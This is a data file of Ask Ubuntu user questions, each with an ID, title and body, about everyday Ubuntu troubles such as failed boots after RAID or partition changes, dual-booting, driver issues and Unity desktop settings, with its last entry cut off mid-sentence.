105052	how do you call unity to distinguish it from unity 2d ?	if i 've mentioned unity 2d in a sentence and now i would like to mention unity and distinguish it so that it will be clear that i 'm talking about unity ( the accelerated one ) and not 2d , how will i call unity ? `` unity 3d '' is just wrong .
105061	replaced drive in raid array -- now ca n't boot ?	i have a home server running 10.04 configured with an mdadm-based raid array . the boot and /home partitions are both on raid-1 arrays , and i have a large data partition on raid-5 . there are three disks , with a partition from each disk making up each mdadm array -- so three arrays ( two raid-1 , one raid-5 ) , each with three disks , /dev/sda , sdb , and sdc . recently , /dev/sda failed , and mdadm kicked it out of the array correctly . i replaced the drive , and am now trying to boot , but when i do , i get an error `` reboot and select proper boot device or insert boot media in selected boot device and press a key . '' it seems that this is likely a message from my asus bios . it seems to me that this is likely due to a missing boot loader . am i correct in this ? i 'm guessing that since /dev/sda is likely what the system is trying to boot off of and since it is now a blank drive until i can boot to rebuild the array , that the machine ca n't boot . oddly , i swear i remember installing grub to all of the disks and making sure they were bootable . i 'm tempted to change the boot order in the bios and see if that works , but i 'm worried that doing this might somehow corrupt the now degraded raid-5 partition ( not sure why ... but i 'd rather not do something i do n't fully understand the implications of ) . how should i go about fixing this ? any help is greatly appreciated .
105065	dual booting ubuntu 11.10 and fedora 16 [ problem partitioning ]	i have 320 gb hard drive . it already has a drive each for ubuntu installation , home , an ntfs drive and swap partition . with the space that is left over , i want to try fedora 16 too as it has some good reviews . however , everytime i try to do so , there is this message that says we can not have more than 4 primary partition . how do i bypass this without losing data ? also , is it possible to use the same home partition for both os ?
105067	can yahoo ! messenger be used with ubuntu ?	i 'm new to ubuntu and the first thing i tried to do is download and install yahoo ! messenger . when i went to install i keep getting an error . is it not compatible ?
105077	mouse get stuck some times	when i installed upuntu for the first time i log in and was going to update it like there were packages and i was trying to do other thing 's like go on the web when the packages were going to be installed but the toachpad got stuck . i was wondering about this but i just do n't know if it will do it again : ( ? ? ?
105078	update wants to uninstall some packages	i recently installed updates from the update manager . to my surprise i noticed that a bunch of installed applications were being removed . the update was mainly some bug fixes for compiz . there was no prior warning that these applications where to be removed in order to complete the update . applications that were removed seemed to be everything i installed like pidgin , ardour , webcam studio , sound indicator , most jack related software . has anyone ever had a similar problem ? i 'm now scared to update . was this a virus ? what do i do ?
105082	how do i find if a package is installed by default for each ubuntu release ?	i know how to check if a package is installed and if its available for install but i can not find any list of packages that are installed with a release from ubuntu . sometimes i am trying to answer something and i can not remember if the tool i will refer was installed by default of if i installed in a later point and cant remember . what if its something i have and a user using another desktop environment does not ? i know i can recommend to install the package prior to asking him to use it but i would like to know if its installed by default or not . is there such list ? where can i find it ?
105083	how to install ruby plugin on eclipse indigo under ubuntu 11.10	i 've had no luck installing the ruby plugin in eclipse indigo v3.7.1 under ubuntu oneiric . the ubuntu community notes apply to earlier versions and do n't help much with my setup . i wonder if you can point me at a more helpful on line resource/ set of instructions/ hand holding site ? many thanks for reading this far : i hope someone can help .
105088	how do i get rid of a notification ?	i occasionally run applications that use the transparent notifications in the ubuntu 11.10 desktop and they generally work fine for me except for when i 'm running them over ssh with x11 forwarding . those notifications dim but never disappear entirely , even after cycling in and out of the screensaver or switching to one of the other desktop panes : any idea what causes this and how to get rid of it ? the only thing that seems to work is to log out entirely . ( i 've checked and i do n't even have notify-osd installed . )
105095	antivirus softwares for ubuntu	yesterday in a certain web site i found that there are so many antivirus programs available for ubuntu . http : //www.makeuseof.com/tag/free-linux-antivirus-programs/ my question is ... . is it necessary to install an antivirus software in ubuntu because i have heard that ubuntu it self is highly protected against threats and linux oss do n't subject to viruses at all .
105097	ignore finger resting at the bottom of trackpad [ unibody macbook pro ]	i have 2 finger scrolling working , and the three finger window movement works great , but something thats really bothering me is that i ca n't rest my thumb on the bottom of the trackpad like i can in osx . is there anything i can do to make this work ?
105101	flash update fails and now it doesnt work only youtube videos work	update manager popped up today so i pressed install since i do n't bother to question it anymore since its reliable and does what its suppose to do.so yeah it was a flash update but it fails and now it doesnt work only youtube videos work.i opened up firefox and it pops this message up asking me to install flash and something else which i cant remember the name of it since at this point i thought i was saved but im pretty sure it was some kind of player or something so i press install but that fails too and as a last result i go checkout the software center and it shows that flash is installed to i uninstall it and try again but no luck still have the same problem and yeah since i am a total noob to ubuntu i do n't really know whats going on anymore . i really need help/thanks for your help in advance .
105102	does someone know why the chromium daily package is n't build anymore ?	it looks like chromium-browser @ https : //launchpad.net/~chromium-daily/+archive/ppa have n't been build for the past 6 weeks . i tried to get in touch with them on launchpad but i 've got no answers ...
105103	how to autohide the launcher in unity 2d ?	in the regular unity 3d , i used compiz config manager where i could configure the unity plug-in to autohide the launcher and not to show it when moving mouse to the left side of the screen . so it was perfect for using docky . but in unity 2d the unity plug-in settings does n't have any effect . how can i completely hide the launcher and just have it shown when pressing the windows-key ? with the following : dconf write /com/canonical/unity-2d/launcher/hide-mode 1 dconf write /com/canonical/unity-2d/launcher/use-strut false it still opens the launcher when moving mouse to the left side of the screen . i 'm using ubuntu 11.10 .
105104	is it possible to install ubuntu-restricted-extras without the ms fonts packages ?	is there anyway to do install ubuntu-restricted-extras without the ms fonts packages ?
105112	which version of ubuntu is best suited for a pentium 4	the question is pretty self-explanatory . i have a 2.8ghz , 1gb ram pc at my office . windows is really slow on it and the android emulator never works properly on it . i am sure that linux will definitely improve performance . what i ca n't decide is which version i should install ? p.s . where can i find older versions of ubuntu ?
105122	how to install a software manually ?	i have recently learnt how to install programs from the terminal and would like to know the meaning of a few commands that i use to install . for example , i downloaded python 3.2 from source and extract and try to install it but failed . i saw in the explanation in other sites that i must use ./configure and make and make altinstall . when i do that , it installs the software but not the suggested packages . why is that ? and what 's the meaning of ./configure and make and make altinstall ? and why do all manually installed software be installed only by this or not at all ?
105126	error message `` bug : unable to handle kernel ''	i extracted the .iso onto a disk , and tried to boot from it . for the longest time , it would n't even boot , instead , it would bypass it and boot from the hard drive , until i swapped my newer disk drive for an older one . when i finally got it to boot , i got the black screen . ran it on text mode and saw it hang on kernel_thread_helper+0x6/0x10 . after a little digging , i managed to get it to install by setting nolacpi on . when it restarted after install and attempted to boot it from the hard drive , it got to grub and ... black , blank , backlit screen of doom . after trying to run recovery mode , it gave me this error : bug : unable to handle kernel that 's it ! no `` null '' , no `` paging request '' , nothing else . above it , it has lines saying : ( i 've only put down about half of the visible screen ) io scheduler noop registered io scheduler deadline registered io scheduler cfq registered ( default ) pci_hotplug : pci hot play pci core version : 0.5 pciehp : pci express hot plug driver version : 0.4 input : sleep button as /devices/lnxsystm:00/device:00/pnpocoe:00/input/input0 acpi : sleep button [ slpb ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input1 acpi : power button [ pwrf ] bug : unable to handle kernel i 've been searching the web for help , and i 've seen that apparently some possible causes of the black screen ( though maybe not the causes of my problem ) are old/bad video drivers , and a faulty power supply . i 've had trouble with my power supply before , as the fan had gotten irreparably stuck , so i replaced it with another , and i have n't had trouble since . after seeing this , i put an nvidia card in , and when i booted , the screen was larger . ( meaning that the grub text was smaller . ) it seemed like it fully utilized the large screen i have . the second time i got onto grub ( i still could n't boot ) , it was the way it looked before adding the card . the third time , it had no purple background , and it was very small , like 640x480 . it also appeared to have really slow screen refresh rates , almost 24 fps . the fourth time , it was super large again ! from the fifth time and onwards , it has been the bnw , small grub . at this point , i decided to reinstall . however , even after turning on nolacpi , it would load , and then eventually hang at the screen with the red/white dots and the ubuntu logo . i did more searching and decided to erase quiet splash vt.handoff=7 , which gets me the old kernel_thread_helper hang , ( booting from the hard drive , now , and not in recovery mode ) , and doing that and adding apci=off gets me to the unable to handle kernel error .
105127	system does not boot after changeing partitions	i have a kubuntu 11.10 system with a hdd ( sda ) and an ssd ( sdb ) . /home and /var and swap are partitions on the hdd and the / partition is the only one on the ssd . all partitions are ext4 ( except swap ) . now i shrinked the /home partition a bit to get a /tmp partition onto the hdd , to be gentle to the ssd . then i introduced a new line into /etc/fstab where i just copied the line from /var and replaced the uuid and the mount point . i cleaned out /tmp and left its mode drwxrwxrwt . proc /proc proc nodev , noexec , nosuid 0 0 uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d / ext4 discard , errors=remount-ro 0 1 uuid=78baabf7-d7a6-420d-a992-d4bebb83e2ed /home ext4 defaults 0 2 uuid=4ebe846f-5fcb-45e8-bad7-2e28d223b183 /var ext4 defaults 0 2 uuid=ce4aaf1a-3841-4bac-8fa3-31bda839a579 /tmp ext4 defaults 0 2 uuid=87439ac8-0044-4a54-8b2d-7cefc644b2a6 none swap sw 0 0 when i rebooted , i got the following error on a solid blue screen : error : could not read file i tried reinstalling grub 2 , following this german wiki . you can see the commands there , i did them to /dev/sdb . how can i fix my system , short of reinstalling everything ? boot priority the ssd is the second sata device , the hdd is the first one : but it is selected as the primary boot device : blkid the output of blkid : # blkid /dev/loop0 : type= '' squashfs '' /dev/sda1 : label= '' hp-var '' uuid= '' 4ebe846f-5fcb-45e8-bad7-2e28d223b183 '' type= '' ext4 '' /dev/sda2 : label= '' hp-user '' uuid= '' 78baabf7-d7a6-420d-a992-d4bebb83e2ed '' type= '' ext4 '' /dev/sda3 : label= '' hp-tmp '' uuid= '' ce4aaf1a-3841-4bac-8fa3-31bda839a579 '' type= '' ext4 '' /dev/sda4 : uuid= '' 87439ac8-0044-4a54-8b2d-7cefc644b2a6 '' type= '' swap '' /dev/sdb1 : label= '' ssd '' uuid= '' 0d6e6bb9-ec95-4563-b74e-323aeb51a63d '' type= '' ext4 '' boot info script that is what the boot info script gives me : boot info script 0.60 from 17 may 2011 ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for ? ? . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ? ? on this drive . sda1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sda2 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sda3 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sda4 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 11.10 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 948,477,600 968,944,409 20,466,810 83 linux /dev/sda2 63 938,179,934 938,179,872 83 linux /dev/sda3 938,179,935 948,477,599 10,297,665 83 linux /dev/sda4 968,960,000 976,771,071 7,811,072 82 linux swap / solaris drive : sdb _____________________________________________________________________ disk /dev/sdb : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 117,229,567 117,227,520 83 linux '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 4ebe846f-5fcb-45e8-bad7-2e28d223b183 ext4 hp-var /dev/sda2 78baabf7-d7a6-420d-a992-d4bebb83e2ed ext4 hp-user /dev/sda3 ce4aaf1a-3841-4bac-8fa3-31bda839a579 ext4 hp-tmp /dev/sda4 87439ac8-0044-4a54-8b2d-7cefc644b2a6 swap /dev/sdb1 0d6e6bb9-ec95-4563-b74e-323aeb51a63d ext4 ssd ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sdb1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d set locale_dir= ( $ root ) /boot/grub/locale set lang=de_de insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 0,71,115 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , mit linux 3.0.0-16-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d linux /boot/vmlinuz-3.0.0-16-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-16-generic } menuentry 'ubuntu , mit linux 3.0.0-16-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d echo 'linux 3.0.0-16-generic wird geladen …' linux /boot/vmlinuz-3.0.0-16-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro recovery nomodeset echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-3.0.0-16-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , mit linux 3.0.0-15-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d linux /boot/vmlinuz-3.0.0-15-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-15-generic } menuentry 'ubuntu , mit linux 3.0.0-15-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d echo 'linux 3.0.0-15-generic wird geladen …' linux /boot/vmlinuz-3.0.0-15-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro recovery nomodeset echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-3.0.0-15-generic } menuentry 'ubuntu , mit linux 3.0.0-14-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d linux /boot/vmlinuz-3.0.0-14-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-14-generic } menuentry 'ubuntu , mit linux 3.0.0-14-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d echo 'linux 3.0.0-14-generic wird geladen …' linux /boot/vmlinuz-3.0.0-14-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro recovery nomodeset echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-3.0.0-14-generic } menuentry 'ubuntu , mit linux 3.0.0-13-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d linux /boot/vmlinuz-3.0.0-13-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-13-generic } menuentry 'ubuntu , mit linux 3.0.0-13-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d echo 'linux 3.0.0-13-generic wird geladen …' linux /boot/vmlinuz-3.0.0-13-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro recovery nomodeset echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-3.0.0-13-generic } menuentry 'ubuntu , mit linux 3.0.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d linux /boot/vmlinuz-3.0.0-12-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-12-generic } menuentry 'ubuntu , mit linux 3.0.0-12-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d echo 'linux 3.0.0-12-generic wird geladen …' linux /boot/vmlinuz-3.0.0-12-generic root=uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d ro recovery nomodeset echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-3.0.0-12-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0d6e6bb9-ec95-4563-b74e-323aeb51a63d linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ `` x $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sdb1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 uuid=0d6e6bb9-ec95-4563-b74e-323aeb51a63d / ext4 discard , errors=remount-ro 0 1 uuid=ce4aaf1a-3841-4bac-8fa3-31bda839a579 /tmp ext4 defaults 0 2 uuid=78baabf7-d7a6-420d-a992-d4bebb83e2ed /home ext4 defaults 0 2 uuid=4ebe846f-5fcb-45e8-bad7-2e28d223b183 /var ext4 defaults 0 2 uuid=87439ac8-0044-4a54-8b2d-7cefc644b2a6 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdb1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 16.268638611 = 17.468317696 boot/grub/core.img 1 16.268650055 = 17.468329984 boot/grub/grub.cfg 1 1.716423035 = 1.842995200 boot/initrd.img-3.0.0-12-generic 2 2.290039062 = 2.458910720 boot/initrd.img-3.0.0-13-generic 2 2.631473541 = 2.825523200 boot/initrd.img-3.0.0-14-generic 2 29.821289062 = 32.020365312 boot/initrd.img-3.0.0-15-generic 2 21.446289062 = 23.027777536 boot/initrd.img-3.0.0-16-generic 2 14.587322235 = 15.663017984 boot/vmlinuz-3.0.0-12-generic 1 0.161544800 = 0.173457408 boot/vmlinuz-3.0.0-13-generic 1 1.880294800 = 2.018951168 boot/vmlinuz-3.0.0-14-generic 2 3.247486115 = 3.486961664 boot/vmlinuz-3.0.0-15-generic 3 2.349048615 = 2.522271744 boot/vmlinuz-3.0.0-16-generic 1 2.349048615 = 2.522271744 vmlinuz 1 3.247486115 = 3.486961664 vmlinuz.old 3 ========= devices which do n't seem to have a corresponding hard drive : ========= sdc sdd sde sdf =============================== stderr messages : =============================== to be able to see for which directory grub2 ( v1.99 ) looks for , install `` unlzma '' . to be able to see for which directory grub2 ( v1.99 ) looks for , install `` unlzma '' .
105128	battery usage management	i am using ubuntu family from 9.04 tile now 11.10 . i checked it 's battery usage times and times and compared it with my windows . in ubuntu my battery get empty faster than windows . at first , has any body else this problem or it is just for me ? and the second if it is true , what can we do to avoid this ?
105134	ca n't boot after update , stuck on a loop	today i updated my ubuntu 11.10 to kernel version 3.0.0-16-generic . after the update i restarted the computer and then i got stuck in a loop right after the initial screen where all the modules are loaded ( showing an [ ok ] text on the right ) . all i see is the mouse pointer and then it goes back to that screen , and so on . in some cases , i can see an error that says : initctl : event failed . what should i do ? thanks in advance , jonathan
105136	reinstall server over desktop	i 'm a linux noob and i 've setup ubuntu desktop on my web server thinking that the ui would help me out some . now i 'm realizing that this probably is n't all the necessary since all my work is now done remotely to that box and i think i may have made a mistake . i understand that the big benefit to server is the lack of ui and extras that come with desktop . so my question is : what would be the simplest/easiest way to go to server from desktop ?
105142	what is fuser and why is it so processor hungry ?	my computer became too slow and according to top fuser is consuming all available cpu time . what the hell is that ? what do i have to do get rid of it ?
105146	custom launchers do n't work like normal launchers , and allow application switching ?	using gnome-desktop-item-edit , i created a custom launcher for chrome . when i use the launcher , it does n't show the arrow next to the icon in the unity launcher , so any windows i open are unmanageable , and do n't even show up while alt-tabbing . this is the launch command : /opt/google/chrome/chrome -- allow-file-access-from-files how do i create a launcher that creates normal , alt-tabbable windows ?
105152	how to fix libreoffice 3.5 to start from launcher icon ?	recently i installed libreoffice 3.5 from debs ( including the ones for desktop integration . since then it behaves in a weird manner . basically it wo n't launch from launcher shortcuts . example : dash > libreoffice launched ( launcher shows with 2 seconds delay ) > 'keep in launcher' lo closed the lo icon on the launcher clicked > pulsating for 5 seconds , then stops > lo did n't launch i did n't look for open processes or anything and ... dash > libreoffice launched immediately without problems it also did n't remember recently opened items , but now it got fixed somehow . other symptoms : - icon on the launcher and all menu categories appear with a delay of few seconds - two writer icons appear on the launcher what i did : used 3.4.5 , uninstalled , installed 3.5 rc3 , problems started to occur uninstalled rc3 'clean ' per http : //wiki.documentfoundation.org/installing_libreoffice_on_linux # debian_.2f_ubuntu_3 installed 3.5 stable which is identical to rc3 still same issues i do n't know if it is related but i use unity test ppa : vanvugt/unity which i needed to solve the stuttering windows bug . any ideas ?
105165	unity-2d : change < super > +s in < super > +w unity-3d style with 1 workspace only	i found here the exact question i want to submit , that is : '' i set /apps/metacity/general/num_workspaces to 1 using gconf-editor but when i do +s it still shows my workspace in the top left corner with the rest of the screen black . should n't it just zoom out and show all of my running apps expose-style for that single workspace ? i want to use -s as an expose-style app switcher . i 've never been a big workspaces fan , so i just want the one . '' thank you !
105171	how to run a ms-dos application in wine ?	i have read that wine supports or might support executing ms-dos apps and games but my question is how . i ca n't find a way to execute them . i am trying monkey island for example or the 7th guest . using wine 1.4rc2 right now . the following link is why i ask this : http : //wiki.winehq.org/winereleasecriteria ? action=show & redirect=winereleaseplan it appears as if dosbox is integrated in wine but this is the confusion . if it is already integrated , how to execute ms-dos .
105173	why ubuntu does n't ask me for password before login ?	when i had 11.04 , there was an option `` ask for password '' , something like this . i checked it out , and instead of password field i got `` login '' button . now , when i got 11.10 , i does n't see that option . but i still do n't have `` password '' field . instead of typing password and hiting enter , i have to click on `` login '' button , and when i see my wallpaper etc . window asking for `` password to unlock keyring database '' appear : / . how can i change that ? i want to type my password , now everybody can login into my account without knowing password . and how to get rid of that window ? my question is similar to this : my pc does not ask password in login even if i set it to ask on login but i ca n't see that option in 11.10 : / . please , help , it 's little bug , but it 's annoying me : / .
105177	built-in speakers in my asus eee pc 1000h netbook do not work after boot	i have to plug and unplug out something into the minijack , and then i am able to hear sound from my speakers . this problem re-occurs everytime i reboot my computer . i am using a asus eee pc 1000h , and i have made sure my volume is up . //additional informations : i created new administrator user , when i log into that user , everything is good . i can hear login sound : ) . when i shutdown my netbook from old user i got `` [ orange star `` '' ] pulseaudio configured for per user session . '' error , but when i turn off netbook from that new user , i do n't got any error like this . okay , now sound works great , just after logging into my account , do n't know how i repaired that , maybe because of creating new account ? o0 . but i still ca n't hear login sound . i can hear that sound when login into other account ( the new one ) . and i still have `` pulseaudio configured for per user session '' warning .
105179	how do i manually install tasks presented to me in the installer ?	recently i installed ubuntu 10.04 lts server and i messed up and didnt select ssh , dns , lamp and tomcat as things that i wanted to install , it is now done with the install process and how do now manually download and install these ?
105189	monitor which process changed the file	i want to know which process changed files in some directory . i had a look at inotify-tools , but it does n't show the pid . i also look at fileschanged utility , but in my case it does n't show anything at all , even that change happened . is there solution ?
105192	how to create a midi connection between applications ?	i have been some trouble using applications that require midi like guitarpro6 and tuxguitar . these both programs make use of midi synthesis . however , i can only listen the midi output when i actually export the files i am working on and ca n't listen anything when i am just inputting notes as i should . any idea how to fix this ?
105195	graphical login impossible	after recently upgrading my media center to 10.04 ( for the lts ) and making lots of updates which may have overwritten stuff ( configs ) , the login was impossible at the name selection menu . vnc does n't work either , it says the server refuses the connection . ( 10061 ) on the other hand , i can still connect to the server via ssh , and the samba shares are unaffected . when i try to login at the computer itself , the screen flashes black a few times and it then brings me back to the name selection menu . via ssh , i tried deleting the xauthority file from the /home directory , renaming it and rebooting afterwards did n't do it either . i tried reinstalling gdm to no avail . can someone explain the difference between x and gdm ?
105199	switching from integrated nvidia to a radeon card ?	i 'm new to ubuntu 11.10 . my father has a dual boot of windows7 and ubuntu 11.10 but had activated a driver for his nvidia integrated card when he installed ubuntu . the other day i installed a msi radeon pci express card in his computer but when i booted to ubuntu all i got was a purple screen . i had read some things about going in to recovery but when i click it it does n't do anything . is this a conflict with the driver of nvidia ? can anyone tell me step by step with commands on what i need to do to get his new radeon card working ? i would like to say thank you very much so far for your help.i did get the proprietary driver removed from the integrated nvidia graphics card and a successful reboot back into ubuntu with nvidia open source driver.then i shut down the computer and installed the radeon graphics card , when i booted up to ubuntu i recieved the same result of a purple blank screen.if i try recovery mode iget nothing.i checked your link of is my ati card supported and it says it does support this card.my first question is should i run the sudo command in terminal that builds up before the drivers for ati before i install the ati card then reboot ? i also noticed on the new ati card it says this '' note that radeonhd 6xx0 chips will need kernel 